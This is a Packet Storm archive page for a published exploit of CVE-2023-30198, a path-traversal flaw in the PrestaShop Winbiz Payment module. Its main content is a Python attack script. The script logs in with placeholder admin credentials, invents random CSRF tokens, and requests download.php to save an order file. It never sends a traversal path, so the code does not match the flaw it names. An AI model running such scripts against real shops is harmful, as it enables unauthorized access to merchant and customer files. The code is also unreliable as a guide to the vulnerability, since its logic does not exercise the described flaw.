exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PrestaShop Winbiz Payment Improper Limitation

PrestaShop Winbiz Payment Improper Limitation
Posted Jun 27, 2023
Authored by Amirhossein Bahramizadeh

PrestaShop Winbiz Payment module suffers from an improper limitation of a Pathname to a restricted directory.

tags | exploit
advisories | CVE-2023-30198
SHA-256 | fd9d9b41b3b106776bf4bded355ea6effd89622c59564f7bfb574cd7059f7f60
Download | Favorite | View

PrestaShop Winbiz Payment Improper Limitation

Change Mirror Download
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)

Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    35 Files
  • 30
    Nov 30th
    25 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close